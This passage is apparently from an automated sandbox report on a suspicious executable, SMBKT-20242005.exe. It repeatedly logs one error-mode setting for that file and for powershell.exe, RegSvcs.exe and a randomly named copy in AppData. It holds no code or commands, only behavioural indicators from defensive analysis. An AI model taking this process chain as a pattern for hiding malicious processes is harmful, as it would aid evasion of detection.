                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
